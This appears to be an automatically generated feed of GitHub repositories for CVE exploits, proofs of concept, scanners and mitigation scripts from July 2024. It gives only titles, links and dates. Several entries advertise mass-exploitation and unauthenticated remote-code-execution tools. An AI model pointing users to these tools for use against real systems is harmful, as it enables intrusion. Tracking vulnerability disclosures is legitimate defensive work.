**Report documentation of this script is below** : [RyanBoomer30/CVE-2021-21239-Exploit](https://github.com/RyanBoomer30/CVE-2021-21239-Exploit) create time: 2024-07-18T23:02:10Z

**Vulnerability checking tool via Nmap Scripting Engine** : [spareack/CVE-2023-22515-NSE](https://github.com/spareack/CVE-2023-22515-NSE) create time: 2024-07-18T19:55:59Z

**no description** : [K3ysTr0K3R/CVE-2020-13945-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2020-13945-EXPLOIT) create time: 2024-07-18T19:05:24Z

**CVE** : [nNoSuger/CVE-2024-4577](https://github.com/nNoSuger/CVE-2024-4577) create time: 2024-07-18T16:39:27Z

**Proof Of Concept for CVE-2024-1874** : [Tgcohce/CVE-2024-1874](https://github.com/Tgcohce/CVE-2024-1874) create time: 2024-07-18T15:25:17Z

**no description** : [meetlight942/PentesterLab-Intercept-CVE-2014-1266](https://github.com/meetlight942/PentesterLab-Intercept-CVE-2014-1266) create time: 2024-07-18T14:45:23Z

**Lighttpd CVE-2022-30780 checker** : [xiw1ll/CVE-2022-30780_Checker](https://github.com/xiw1ll/CVE-2022-30780_Checker) create time: 2024-07-18T13:09:44Z

**no description** : [coana-tech/CVE-2022-0155-PoC](https://github.com/coana-tech/CVE-2022-0155-PoC) create time: 2024-07-18T12:57:18Z

**no description** : [hlong12042/CVE-2017-11317-and-CVE-2017-11357-in-Telerik](https://github.com/hlong12042/CVE-2017-11317-and-CVE-2017-11357-in-Telerik) create time: 2024-07-18T11:41:16Z

**no description** : [ze0r/vmware-escape-CVE-2023-20872-poc](https://github.com/ze0r/vmware-escape-CVE-2023-20872-poc) create time: 2024-07-18T11:45:30Z

**no description** : [ze0r/vmware-escape-CVE-2023-20872-poc](https://github.com/ze0r/vmware-escape-CVE-2023-20872-poc) create time: 2024-07-18T11:08:17Z

**Exploit for CVE-2024-31989.** : [vt0x78/CVE-2024-31989](https://github.com/vt0x78/CVE-2024-31989) create time: 2024-07-17T14:23:52Z

**This is a test repository for CVE-2018-17456** : [KKkai0315/CVE-2018-17456](https://github.com/KKkai0315/CVE-2018-17456) create time: 2024-07-18T09:51:48Z

**PoC for the CVE-2024-29042 based on Cache poisoning attack** : [Cr3upsy/PoC_CVE-2024-29042](https://github.com/Cr3upsy/PoC_CVE-2024-29042) create time: 2024-07-18T07:47:31Z

**This script exploits the "Port Shadow" vulnerability (CVE-2021-3773) in OpenVPN servers using Netfilter for NAT.** : [d0rb/CVE-2021-3773](https://github.com/d0rb/CVE-2021-3773) create time: 2024-07-18T06:43:12Z

**no description** : [Mustafa1986/CVE-2024-22274-RCE](https://github.com/Mustafa1986/CVE-2024-22274-RCE) create time: 2024-07-18T06:18:57Z

**reproduce some CVES** : [ArjunSridharkumar/reproduce_cves_2024](https://github.com/ArjunSridharkumar/reproduce_cves_2024) create time: 2024-07-18T04:45:39Z

**Mass Exploit - CVE-2024-33544 < Unauthenticated < SQL Injection** : [codeb0ss/CVE-2024-33544-PoC](https://github.com/codeb0ss/CVE-2024-33544-PoC) create time: 2024-07-17T22:13:50Z

**no description** : [W1hithat/CVE-2024-6387](https://github.com/W1hithat/CVE-2024-6387) create time: 2024-07-17T19:14:11Z

**no description** : [meetlight942/PentesterLab-Intercept-CVE-2011-0228](https://github.com/meetlight942/PentesterLab-Intercept-CVE-2011-0228) create time: 2024-07-17T18:37:21Z

**Web scraper and port scanner designed to identify potential targets compromised by the recently discovered unpatched security flaw CVE-2024-0056** : [frederickernest/ManInTheMiddle](https://github.com/frederickernest/ManInTheMiddle) create time: 2024-07-16T23:05:33Z

**no description** : [meetlight942/PentesterLab-Intercept-CVE-2011-0228](https://github.com/meetlight942/PentesterLab-Intercept-CVE-2011-0228) create time: 2024-07-17T15:16:50Z

**no description** : [hlong12042/CVE-2017-9248](https://github.com/hlong12042/CVE-2017-9248) create time: 2024-07-17T14:49:07Z

**PHP CGI Argument Injection (CVE-2024-4577) Remote Code Execution PoC** : [PizzaboiBestLegits/CVE-2024-4577](https://github.com/PizzaboiBestLegits/CVE-2024-4577) create time: 2024-07-17T11:46:34Z

**no description** : [alemusix/cve-2024-XXXXX](https://github.com/alemusix/cve-2024-XXXXX) create time: 2024-07-17T07:00:31Z

**Proof of concept for CVE-2023-30800** : [griffinsectio/CVE-2023-30800_PoC](https://github.com/griffinsectio/CVE-2023-30800_PoC) create time: 2024-07-17T06:24:41Z

**Cross-Site Request Forgery (CSRF) vulnerability in the password change function, which allows remote attackers to change the admin password without the user's consent, leading to a potential account takeover.** : [sudo-subho/nepstech-xpon-router-CVE-2024-40119](https://github.com/sudo-subho/nepstech-xpon-router-CVE-2024-40119) create time: 2024-07-17T03:03:42Z

**Script para eliminar vulnerabilidad de openssh de ubuntu 22.04 LTS** : [mrtacojr/CVE-2023-38408](https://github.com/mrtacojr/CVE-2023-38408) create time: 2024-07-17T02:00:31Z

**geoserver CVE-2024-36401 一键漏洞利用工具** : [MInggongK/geoserver-](https://github.com/MInggongK/geoserver-) create time: 2024-07-16T17:29:39Z

**no description** : [khanhtranngoccva/cve-2023-38831-poc](https://github.com/khanhtranngoccva/cve-2023-38831-poc) create time: 2024-07-16T13:54:09Z

**BlueStacks privilege escalation through VM backdooring** : [mmiszczyk/CVE-2024-33352](https://github.com/mmiszczyk/CVE-2024-33352) create time: 2024-07-16T07:38:19Z

**Laravel Debug Mode and Payload** : [Tinsleytrn/CVE-2021-3129-](https://github.com/Tinsleytrn/CVE-2021-3129-) create time: 2024-07-16T06:48:24Z

**no description** : [Praison001/CVE-2024-4879-ServiceNow](https://github.com/Praison001/CVE-2024-4879-ServiceNow) create time: 2024-07-16T04:03:28Z

**Exploits for Tenda Ac8v4 stack-based overflow to Remote-Code Execution via Mipsel Ropping (CVE-2023-33669 - CVE-2023-33675)** : [retr0reg/Tenda-Ac8v4-PoC](https://github.com/retr0reg/Tenda-Ac8v4-PoC) create time: 2023-05-13T04:10:15Z

**On October 4, 2021, Apache HTTP Server Project released Security advisory on a Path traversal and File disclosure vulnerability in Apache HTTP Server 2.4.49 and 2.4.50 tracked as CVE-2021-41773 and CVE-2021-42013. In the advisory, Apache also highlighted “the issue is known to be exploited in the wild” and later it was identified that the vulnerabi** : [Jhonsonwannaa/cve-2021-42013-apache](https://github.com/Jhonsonwannaa/cve-2021-42013-apache) create time: 2024-07-16T00:12:18Z

**Automated PHP remote code execution scanner for CVE-2024-4577** : [waived/CVE-2024-4577-PHP-RCE](https://github.com/waived/CVE-2024-4577-PHP-RCE) create time: 2024-07-15T21:31:14Z

**OpenSSH RCE Massive Vulnerable Scanner** : [ThatNotEasy/CVE-2024-6387](https://github.com/ThatNotEasy/CVE-2024-6387) create time: 2024-07-15T16:04:57Z

**CVE-2024-34102 unauthenticated RCE PoC for Magento/adobe commerce** : [b4h1x/CVE-2024-34102-RCE](https://github.com/b4h1x/CVE-2024-34102-RCE) create time: 2024-07-15T15:08:11Z

**A test repository for the vulnerability CVE-2024-35242's PoC** : [KKkai0315/CVE-2024-35242](https://github.com/KKkai0315/CVE-2024-35242) create time: 2024-07-15T15:01:31Z

**A test repository for this vulnerability's pod** : [KKkai0315/CVE-2024-35242](https://github.com/KKkai0315/CVE-2024-35242) create time: 2024-07-15T14:14:30Z

**no description** : [ShadowByte1/CVE-2024-4879](https://github.com/ShadowByte1/CVE-2024-4879) create time: 2024-07-15T12:27:33Z

**利用CVE-2024-0044 在Android12、13 下提权** : [Kai2er/CVE-2024-0044-EXP](https://github.com/Kai2er/CVE-2024-0044-EXP) create time: 2024-07-15T08:45:44Z

**Kernel exploit for Xbox SystemOS using CVE-2024-30088** : [exploits-forsale/collateral-damage](https://github.com/exploits-forsale/collateral-damage) create time: 2024-07-15T08:07:05Z

**CVE-2021-44228** : [ShlomiRex/log4shell_lab](https://github.com/ShlomiRex/log4shell_lab) create time: 2023-11-30T18:55:40Z

**PoC - Authenticated Remote Code Execution in VMware vCenter Server (CVE-2024-22274 Exploit))** : [l0n3m4n/CVE-2024-22274-RCE](https://github.com/l0n3m4n/CVE-2024-22274-RCE) create time: 2024-07-15T07:26:59Z

**no description** : [tequilasunsh1ne/CVE_2024_4879](https://github.com/tequilasunsh1ne/CVE_2024_4879) create time: 2024-07-15T02:51:34Z

**LMS Chamilo 1.11.24 CVE-2023-4220 Exploit** : [Al3xGD/CVE-2023-4220-Exploit](https://github.com/Al3xGD/CVE-2023-4220-Exploit) create time: 2024-07-15T01:38:47Z

**no description** : [ShadowByte1/CVE-2024-24919](https://github.com/ShadowByte1/CVE-2024-24919) create time: 2024-07-14T23:26:51Z

**OpenSSH a publié un avis de sécurité concernant la vulnérabilité critique CVE-2024-6387. Cette vulnérabilité permet à un attaquant non authentifié d'exécuter du code arbitraire** : [Jhonsonwannaa/CVE-2024-6387](https://github.com/Jhonsonwannaa/CVE-2024-6387) create time: 2024-07-14T18:00:49Z

**no description** : [Phantom-IN/CVE-2024-34102](https://github.com/Phantom-IN/CVE-2024-34102) create time: 2024-07-14T08:40:59Z

**Exploit para abusar de la vulnerabilidad Shellshock (CVE-2014-6271).** : [TheRealCiscoo/Shellshock-Exploit](https://github.com/TheRealCiscoo/Shellshock-Exploit) create time: 2024-07-14T06:19:18Z

**OpenPetra v.2023.02 CVE-2024-40512** : [Jansen-C-Moreira/CVE-2024-40512](https://github.com/Jansen-C-Moreira/CVE-2024-40512) create time: 2024-07-13T22:06:16Z

**OpenPetra v.2023.02 CVE-2024-40511** : [Jansen-C-Moreira/CVE-2024-40511](https://github.com/Jansen-C-Moreira/CVE-2024-40511) create time: 2024-07-13T22:04:53Z

**OpenPetra v.2023.02 CVE-2024-40510** : [Jansen-C-Moreira/CVE-2024-40510](https://github.com/Jansen-C-Moreira/CVE-2024-40510) create time: 2024-07-13T22:03:17Z

**OpenPetra v.2023.02 CVE-2024-40509** : [Jansen-C-Moreira/CVE-2024-40509](https://github.com/Jansen-C-Moreira/CVE-2024-40509) create time: 2024-07-13T22:01:39Z

**OpenPetra v.2023.02 CVE-2024-40508** : [Jansen-C-Moreira/CVE-2024-40508](https://github.com/Jansen-C-Moreira/CVE-2024-40508) create time: 2024-07-13T21:54:07Z

**OpenPetra v.2023.02 Use CVE-2024-40507** : [Jansen-C-Moreira/CVE-2024-40507](https://github.com/Jansen-C-Moreira/CVE-2024-40507) create time: 2024-07-13T21:50:57Z

**OpenPetra v.2023.02 CVE-2024-40506** : [Jansen-C-Moreira/CVE-2024-40506](https://github.com/Jansen-C-Moreira/CVE-2024-40506) create time: 2024-07-13T21:42:23Z

**CVE-2024-39250 TimeTrax SQLi** : [efrann/CVE-2024-39250](https://github.com/efrann/CVE-2024-39250) create time: 2024-07-13T20:29:31Z

**Script to address CVE-2024-6387 by changing the LoginGraceTime in sshd.** : [liqhtnd/sshd-logingracetime0](https://github.com/liqhtnd/sshd-logingracetime0) create time: 2024-07-04T01:02:34Z

**CVE-2024-34102 Exploiter based on Python** : [bughuntar/CVE-2024-34102-Python](https://github.com/bughuntar/CVE-2024-34102-Python) create time: 2024-07-13T17:31:10Z

**Mass Exploit - CVE-2024-20353 [Cisco] < Unauthenticated < Denial Of Service** : [codeb0ss/CVE-2024-20353-PoC](https://github.com/codeb0ss/CVE-2024-20353-PoC) create time: 2024-07-13T16:04:25Z

**Exploitation CVE-2024-34102** : [bughuntar/CVE-2024-34102](https://github.com/bughuntar/CVE-2024-34102) create time: 2024-07-13T10:25:23Z

**Automatic vuln scanner and exploiter for l7 ddos attacks using Chamilio CVE-2023-34960** : [dvtarsoul/ChExp](https://github.com/dvtarsoul/ChExp) create time: 2024-07-13T08:30:18Z

**no description** : [zgimszhd61/CVE-2024-4879](https://github.com/zgimszhd61/CVE-2024-4879) create time: 2024-07-13T07:02:18Z

**no description** : [minendie/POC_CVE-2024-40492](https://github.com/minendie/POC_CVE-2024-40492) create time: 2024-07-13T04:57:48Z

**no description** : [s1d6point7bugcrowd/CVE-2022-20713-Vulnerability-Detection-Script](https://github.com/s1d6point7bugcrowd/CVE-2022-20713-Vulnerability-Detection-Script) create time: 2024-07-12T22:53:45Z

**no description** : [Mr-r00t11/CVE-2024-4879](https://github.com/Mr-r00t11/CVE-2024-4879) create time: 2024-07-12T21:43:48Z

**Mass Exploit - CVE-2024-29824 - Ivanti EPM - Remote Code Execution (RCE)** : [codeb0ss/CVE-2024-29824-PoC](https://github.com/codeb0ss/CVE-2024-29824-PoC) create time: 2024-07-12T19:26:10Z

**Detection method for Exim vulnerability CVE-2024-39929** : [rxerium/CVE-2024-39929](https://github.com/rxerium/CVE-2024-39929) create time: 2024-07-12T18:01:30Z

**no description** : [BlackFrog-hub/cve-2015-1328](https://github.com/BlackFrog-hub/cve-2015-1328) create time: 2024-07-12T14:17:38Z

**Bulk scanning tool for ServiceNow CVE-2024-4879 vulnerability** : [bigb0x/CVE-2024-4879](https://github.com/bigb0x/CVE-2024-4879) create time: 2024-07-12T13:02:47Z

**CVE-2024-34102 unauthenticated RCE PoC for Magento/adobe commerce** : [1mpl3ment3d/CVE-2024-34102-RCE-POC](https://github.com/1mpl3ment3d/CVE-2024-34102-RCE-POC) create time: 2024-07-12T11:17:01Z

**CVE-2024-4879 - Jelly Template Injection Vulnerability in ServiceNow** : [Brut-Security/CVE-2024-4879](https://github.com/Brut-Security/CVE-2024-4879) create time: 2024-07-12T10:32:37Z

**no description** : [11k4r/CVE-2017-1235_exploit](https://github.com/11k4r/CVE-2017-1235_exploit) create time: 2024-07-12T09:25:31Z

**no description** : [jakabakos/CVE-2024-36401-GeoServer-RCE](https://github.com/jakabakos/CVE-2024-36401-GeoServer-RCE) create time: 2024-07-12T07:01:12Z

**Lỗ hổng thực thi mã không được xác thực từ xa trong máy chủ OpenSSH** : [k4t3pr0/CVE-2024-6387-Check](https://github.com/k4t3pr0/CVE-2024-6387-Check) create time: 2024-07-12T03:28:41Z

**Fix for regreSSHion CVE-2024-6387 for Ubuntu and Debian** : [Passyed/regreSSHion-Fix](https://github.com/Passyed/regreSSHion-Fix) create time: 2024-07-11T23:22:14Z

**no description** : [Xiaolqy/CVE-2024-11451](https://github.com/Xiaolqy/CVE-2024-11451) create time: 2024-07-11T23:16:33Z

**CVE-2024-0044: uma vulnerabilidade de alta gravidade do tipo "executar como qualquer aplicativo" que afeta as versões 12 e 13 do Android** : [007CRIPTOGRAFIA/c-CVE-2024-0044](https://github.com/007CRIPTOGRAFIA/c-CVE-2024-0044) create time: 2024-07-11T18:46:45Z

**This a CVE I found it in VDP at hackerone Platform** : [0xMe5war/CVE-2000-0114](https://github.com/0xMe5war/CVE-2000-0114) create time: 2024-07-11T18:14:05Z

**OpenSSH vulnerability CVE-2024-6387** : [Sibijo/mitigate_ssh](https://github.com/Sibijo/mitigate_ssh) create time: 2024-07-11T16:54:41Z

**Examining the phases of an attack using “Dragonfish's Elise Malware”, specifically, exploring the exploitation of vulnerability CVE-2017-11882.** : [jadeapar/Dragonfish-s-Malware-Cyber-Analysis](https://github.com/jadeapar/Dragonfish-s-Malware-Cyber-Analysis) create time: 2024-07-11T16:15:27Z

**This project demonstrates a Web Application Firewall (WAF) simulation using Flask and a vulnerability checker for CVE-2017-5638. The WAF middleware blocks HTTP requests containing specific patterns, and the vulnerability checker tests for and exploits the Apache Struts 2 vulnerability (CVE-2017-5638).** : [Nithylesh/web-application-firewall-](https://github.com/Nithylesh/web-application-firewall-) create time: 2024-07-11T15:16:56Z

**CVE-2024-6387, also known as RegreSSHion, is a high-severity vulnerability found in OpenSSH servers (sshd) running on glibc-based Linux systems. It is a regression of a previously fixed vulnerability (CVE-2006-5051), which means the issue was reintroduced in newer versions of OpenSSH.** : [ThemeHackers/CVE-2024-6387](https://github.com/ThemeHackers/CVE-2024-6387) create time: 2024-07-11T14:37:17Z

**Perform with massive Wordpress SQLI 2 RCE** : [ThatNotEasy/CVE-2024-27956](https://github.com/ThatNotEasy/CVE-2024-27956) create time: 2024-07-11T14:17:23Z

**CVE-2023–4220 Exploit** : [nr4x4/CVE-2023-4220](https://github.com/nr4x4/CVE-2023-4220) create time: 2024-07-11T13:06:17Z

**Bulk Scanning Tool for OpenSSH CVE-2024-6387, CVE-2024-6409, CVE-2006-5051, CVE-2008-4109, and 16 other CVEs.** : [bigb0x/SSH-Scanner](https://github.com/bigb0x/SSH-Scanner) create time: 2024-07-11T11:56:42Z

**Burp Extension to test for CVE-2024-34102** : [crynomore/CVE-2024-34102](https://github.com/crynomore/CVE-2024-34102) create time: 2024-07-11T11:54:08Z

**no description** : [0xmupa/CVE-2024-37147-PoC](https://github.com/0xmupa/CVE-2024-37147-PoC) create time: 2024-07-11T10:20:00Z

**no description** : [0xmupa/CVE-2024-37147-PoC](https://github.com/0xmupa/CVE-2024-37147-PoC) create time: 2024-07-11T10:14:23Z

**ThinkAdmin v5 v6 任意文件读取漏洞利用,可自定义字典爆破** : [simonlee-hello/CVE-2020-25540](https://github.com/simonlee-hello/CVE-2020-25540) create time: 2024-07-11T07:59:52Z

**no description** : [ninhpn1337/CVE-2024-22274](https://github.com/ninhpn1337/CVE-2024-22274) create time: 2024-07-11T04:13:59Z

**ATTACK PoC - PHP CVE-2024-4577** : [bibo318/CVE-2024-4577-RCE-ATTACK](https://github.com/bibo318/CVE-2024-4577-RCE-ATTACK) create time: 2024-07-11T02:22:32Z

**Python script to scan for CVE-2000-0114 vulnerability in Frontpage Server Extensions. Automates subdomain enumeration and vulnerability scanning using subfinder and nuclei. For educational and professional use in cybersecurity assessments.** : [Josekutty-K/frontpage-server-extensions-vulnerability-scanner](https://github.com/Josekutty-K/frontpage-server-extensions-vulnerability-scanner) create time: 2024-07-11T00:08:44Z

**year 2 semester 1 Systems and Network Programming Assignment** : [Cmadhushanka/CVE-2015-3864-Exploitation](https://github.com/Cmadhushanka/CVE-2015-3864-Exploitation) create time: 2024-07-10T18:02:38Z

**year 2 semester 1 Systems and Network Programming Assignment** : [Cmadhushanka/CVE-2019-6447-Exploitation](https://github.com/Cmadhushanka/CVE-2019-6447-Exploitation) create time: 2024-07-10T18:04:14Z

**year 2 semester 1 Systems and Network Programming Assignment** : [Cmadhushanka/CVE-2023-32784-Exploitation](https://github.com/Cmadhushanka/CVE-2023-32784-Exploitation) create time: 2024-07-10T17:55:48Z

**POC code for CVE-2024-29510 and demo VulnApp** : [swsmith2391/CVE-2024-29510](https://github.com/swsmith2391/CVE-2024-29510) create time: 2024-07-09T13:27:40Z

**CVE-2024-34102 unauthenticated RCE PoC for Magento/adobe commerce** : [Ex-Arn/CVE-2024-34102-RCE](https://github.com/Ex-Arn/CVE-2024-34102-RCE) create time: 2024-07-10T16:40:19Z

**Demonstrate some functionalities of Morion by generating an exploit for CVE-2022-27646 (stack buffer overflow on Netgear R6700v3 routers).** : [cyber-defence-campus/netgear_r6700v3_circled](https://github.com/cyber-defence-campus/netgear_r6700v3_circled) create time: 2023-06-01T05:10:56Z

**no description** : [DimaMend/cve-2024-6387-poc](https://github.com/DimaMend/cve-2024-6387-poc) create time: 2024-07-10T13:27:23Z

**Path traversal vulnerability in Splunk Enterprise on Windows versions below 9.2.2, 9.1.5, and 9.0.10 that allows reading sensitive files.** : [Cappricio-Securities/CVE-2024-36991](https://github.com/Cappricio-Securities/CVE-2024-36991) create time: 2024-07-10T09:42:08Z

**CVE-2024-37032 scanner** : [ahboon/CVE-2024-37032-scanner](https://github.com/ahboon/CVE-2024-37032-scanner) create time: 2024-07-10T07:24:09Z

**An authenticated RCE exploit for Dolibarr ERP/CRM CVE-2023-30253.** : [andria-dev/DolibabyPhp](https://github.com/andria-dev/DolibabyPhp) create time: 2024-07-10T05:39:01Z

**Rejetto HTTP File Server (HFS) 2.x - Unauthenticated RCE exploit module (CVE-2024-23692)** : [pradeepboo/Rejetto-HFS-2.x-RCE-CVE-2024-23692-](https://github.com/pradeepboo/Rejetto-HFS-2.x-RCE-CVE-2024-23692-) create time: 2024-07-10T04:44:27Z

**POC for CVE-2023-4220 - Chamilo LMS Unauthenticated Big Upload File Remote Code Execution** : [krishnan-tech/CVE-2023-4226-POC](https://github.com/krishnan-tech/CVE-2023-4226-POC) create time: 2024-07-10T02:26:01Z

**Guardian Code: A Script to Uncover CVE-2024-5274 Vulnerabilities** : [Alchemist3dot14/-CVE-2024-5274-Detection](https://github.com/Alchemist3dot14/-CVE-2024-5274-Detection) create time: 2024-07-10T02:15:56Z

**no description** : [lavenderlilly/CVE-2022-32250](https://github.com/lavenderlilly/CVE-2022-32250) create time: 2024-07-03T02:18:58Z

**PoC for CVE-2023-28432** : [fhAnso/CVE-2023-28432](https://github.com/fhAnso/CVE-2023-28432) create time: 2024-07-09T21:10:33Z

**Remote Code Execution for Chamilo LMS** : [HusenjanDev/CVE-2023-422-Chamilo-LMS-RCE](https://github.com/HusenjanDev/CVE-2023-422-Chamilo-LMS-RCE) create time: 2024-07-09T20:47:00Z

**This Rust Code is designed to check SSH servers for the CVE-2024-6387 vulnerability** : [kubota/CVE-2024-6387-Vulnerability-Checker](https://github.com/kubota/CVE-2024-6387-Vulnerability-Checker) create time: 2024-07-09T21:01:15Z

**Proof of concept exploit for CVE-2023-4220** : [B1TC0R3/CVE-2023-4220-PoC](https://github.com/B1TC0R3/CVE-2023-4220-PoC) create time: 2024-07-09T20:06:40Z

**no description** : [alperenugurlu/CVE-2024-3596-Detector](https://github.com/alperenugurlu/CVE-2024-3596-Detector) create time: 2024-07-09T19:44:40Z

**This Python script checks for the CVE-2024-6387 vulnerability in OpenSSH servers. It supports multiple IP addresses, URLs, CIDR ranges, and ports. The script can also read addresses from a file.** : [filipi86/CVE-2024-6387-Vulnerability-Checker](https://github.com/filipi86/CVE-2024-6387-Vulnerability-Checker) create time: 2024-07-09T17:40:19Z

**CVE-2024-5009 : WhatsUp Gold SetAdminPassword Privilege Escalation** : [th3gokul/CVE-2024-5009](https://github.com/th3gokul/CVE-2024-5009) create time: 2024-07-09T16:56:49Z

**no description** : [HO4XXX/cve-2023-4220-poc](https://github.com/HO4XXX/cve-2023-4220-poc) create time: 2024-07-09T16:09:18Z

**no description** : [Mr-r00t11/CVE-2024-37081](https://github.com/Mr-r00t11/CVE-2024-37081) create time: 2024-07-09T16:14:41Z

**no description** : [mrmtwoj/CVE-2024-6387](https://github.com/mrmtwoj/CVE-2024-6387) create time: 2024-07-09T14:06:02Z

**no description** : [yougboiz/Metasploit-CVE-2004-6768](https://github.com/yougboiz/Metasploit-CVE-2004-6768) create time: 2024-07-09T13:01:41Z

**no description** : [dgourillon/mitigate-CVE-2024-6387](https://github.com/dgourillon/mitigate-CVE-2024-6387) create time: 2024-07-09T12:16:44Z

**CVE-2024-39069** : [AungSoePaing/CVE-2024-39069](https://github.com/AungSoePaing/CVE-2024-39069) create time: 2024-07-09T11:24:44Z

**no description** : [ToontjeM/CVE-2017-15099](https://github.com/ToontjeM/CVE-2017-15099) create time: 2024-07-09T11:07:50Z

**it's a CVE-2022-3368 ( patched ), but feel free to use it for check any outdated software or reseach** : [pxcs/CrackAVFee](https://github.com/pxcs/CrackAVFee) create time: 2024-03-05T18:31:29Z

**it's a CVE-2023-28229 ( patched ), but feel free to use it for check any outdated software or reseach** : [pxcs/CrackKeyIso](https://github.com/pxcs/CrackKeyIso) create time: 2024-03-27T20:57:46Z

**it's a CVE-2023-28252 ( patched ), but feel free to use it for check any outdated software or reseach** : [pxcs/CLFS](https://github.com/pxcs/CLFS) create time: 2024-03-21T16:16:52Z

**Stored Cross-Side Scripting (XSS) leads to privilege escalation in SilverPeas social-networking portal** : [toneemarqus/CVE-2024-39031](https://github.com/toneemarqus/CVE-2024-39031) create time: 2024-07-08T23:21:52Z

**This is a exploit for CVE-2007-2447; Vulnerable SMB** : [IamLucif3r/CVE-2007-2447-Exploit](https://github.com/IamLucif3r/CVE-2007-2447-Exploit) create time: 2024-07-08T20:03:32Z

**Just a script to test if xz is vulnerable to the cve 2024-3094.** : [yq93dskimzm2/CVE-2024-3094](https://github.com/yq93dskimzm2/CVE-2024-3094) create time: 2024-07-08T15:57:27Z

**Exploit for CVE-2024-5009** : [sinsinology/CVE-2024-5009](https://github.com/sinsinology/CVE-2024-5009) create time: 2024-07-08T12:15:29Z

**Exploit for CVE-2024-4885** : [sinsinology/CVE-2024-4885](https://github.com/sinsinology/CVE-2024-4885) create time: 2024-07-08T12:14:42Z

**Exploit for CVE-2024-4883** : [sinsinology/CVE-2024-4883](https://github.com/sinsinology/CVE-2024-4883) create time: 2024-07-08T12:14:01Z

**Chef Inspec profile for checking regreSSHion vulnerability CVE-2024-6387** : [vkaushik-chef/regreSSHion](https://github.com/vkaushik-chef/regreSSHion) create time: 2024-07-08T11:48:15Z

**Remote Unauthenticated Code Execution Vulnerability in OpenSSH server (CVE-2024-6387)** : [asterictnl-lvdw/CVE-2024-6387](https://github.com/asterictnl-lvdw/CVE-2024-6387) create time: 2024-07-08T11:27:49Z

**poc for CVE-2024-34102** : [unknownzerobit/poc](https://github.com/unknownzerobit/poc) create time: 2024-07-08T11:23:12Z

**This is an Exploit for Unrestricted file upload in big file upload functionality in Chamilo-LMS for this location "/main/inc/lib/javascript/bigupload/inc/bigUpload.php" in Chamilo LMS <= v1.11.24, and Attackers can obtain remote code execution via uploading of web shell.** : [Ziad-Sakr/Chamilo-LMS-CVE-2023-4220-Exploit](https://github.com/Ziad-Sakr/Chamilo-LMS-CVE-2023-4220-Exploit) create time: 2024-07-08T09:48:38Z

**CVE-2023-4220 POC RCE** : [insomnia-jacob/CVE-2023-4220-](https://github.com/insomnia-jacob/CVE-2023-4220-) create time: 2024-07-08T07:31:35Z

**no description** : [ToontjeM/CVE-2022-21724](https://github.com/ToontjeM/CVE-2022-21724) create time: 2024-07-08T07:13:55Z

**no description** : [tequilasunsh1ne/CVE_2024_39943](https://github.com/tequilasunsh1ne/CVE_2024_39943) create time: 2024-07-08T03:38:18Z

**no description** : [tequilasunsh1ne/CVE_2024_27292](https://github.com/tequilasunsh1ne/CVE_2024_27292) create time: 2024-07-08T03:30:14Z

**CVE-2024-36401-POC** : [zjaycyy/CVE-2024-36401](https://github.com/zjaycyy/CVE-2024-36401) create time: 2024-07-08T01:53:32Z

**CosmicSting (CVE-2024-34102) POC / Patch Validator** : [SamJUK/cosmicsting-validator](https://github.com/SamJUK/cosmicsting-validator) create time: 2024-07-07T23:35:18Z

**Exploitation Scanner Cross Site Scripting vulnerability in Keycloak.** : [cscpwn0sec/CVE-2021-20323](https://github.com/cscpwn0sec/CVE-2021-20323) create time: 2024-07-07T23:02:00Z

**This repository contains an exploit for CVE-2024-34361, a critical Pi-hole vulnerability (CVSS 8.6). It uses SSRF to achieve RCE by exploiting improper URL validation, allowing attackers to send arbitrary requests and execute commands on the system. Disclaimer: For educational and ethical security testing only. Unauthorized use is illegal.** : [T0X1Cx/CVE-2024-34361-PiHole-SSRF-to-RCE](https://github.com/T0X1Cx/CVE-2024-34361-PiHole-SSRF-to-RCE) create time: 2024-07-07T21:22:36Z

**https://starlabs.sg/advisories/23/23-4220/** : [charlesgargasson/CVE-2023-4220](https://github.com/charlesgargasson/CVE-2023-4220) create time: 2024-07-07T16:57:18Z

**Unrestricted file upload in big file upload functionality in `/main/inc/lib/javascript/bigupload/inc/bigUpload.php` in Chamilo LMS <= v1.11.24 allows unauthenticated attackers to perform stored cross-site scripting attacks and obtain remote code execution via uploading of web shell.** : [dollarboysushil/Chamilo-LMS-Unauthenticated-File-Upload-CVE-2023-4220](https://github.com/dollarboysushil/Chamilo-LMS-Unauthenticated-File-Upload-CVE-2023-4220) create time: 2024-07-07T15:53:54Z

**This is a script written in Python that allows the exploitation of the Chamilo's LMS software security flaw described in CVE-2023-4220** : [m3m0o/chamilo-lms-unauthenticated-big-upload-rce-poc](https://github.com/m3m0o/chamilo-lms-unauthenticated-big-upload-rce-poc) create time: 2024-07-07T15:08:30Z

**Here's a Python script that checks if the polyfill.io domain is present in the Content Security Policy (CSP) header of a given web application.** : [Havoc10-sw/Detect_polyfill_CVE-2024-38537-](https://github.com/Havoc10-sw/Detect_polyfill_CVE-2024-38537-) create time: 2024-07-07T15:06:39Z

**no description** : [sysonlai/CVE-2024-32002-hook](https://github.com/sysonlai/CVE-2024-32002-hook) create time: 2024-07-07T14:50:23Z

**no description** : [sysonlai/CVE-2024-32002-main](https://github.com/sysonlai/CVE-2024-32002-main) create time: 2024-07-07T14:34:41Z

**pentesterlab** : [iNoSec2/cve-2018-6574](https://github.com/iNoSec2/cve-2018-6574) create time: 2024-07-07T14:05:43Z

**Deep Sea Electronics DSE855 - Authentication Bypass** : [Cappricio-Securities/CVE-2024-5947](https://github.com/Cappricio-Securities/CVE-2024-5947) create time: 2024-07-07T14:03:49Z

**no description** : [ildefonso0/php-7.2.34-CVE-2024](https://github.com/ildefonso0/php-7.2.34-CVE-2024) create time: 2024-07-07T13:57:59Z

**this is test POC for git_rce** : [xiaomaoxxx/CVE-2024-23002](https://github.com/xiaomaoxxx/CVE-2024-23002) create time: 2024-07-07T12:55:29Z

**no description** : [NextGenPentesters/CVE-2024-37726-MSI-Center-Local-Privilege-Escalation](https://github.com/NextGenPentesters/CVE-2024-37726-MSI-Center-Local-Privilege-Escalation) create time: 2024-07-07T09:21:21Z

**Chamilo LMS Unauthenticated Remote Code Execution** : [N1ghtfallXxX/CVE-2023-4220](https://github.com/N1ghtfallXxX/CVE-2023-4220) create time: 2024-07-07T02:09:06Z

**PoC - PHP CGI Argument Injection CVE-2024-4577 (Scanner and Exploitation)** : [l0n3m4n/CVE-2024-4577-RCE](https://github.com/l0n3m4n/CVE-2024-4577-RCE) create time: 2024-07-06T19:37:14Z

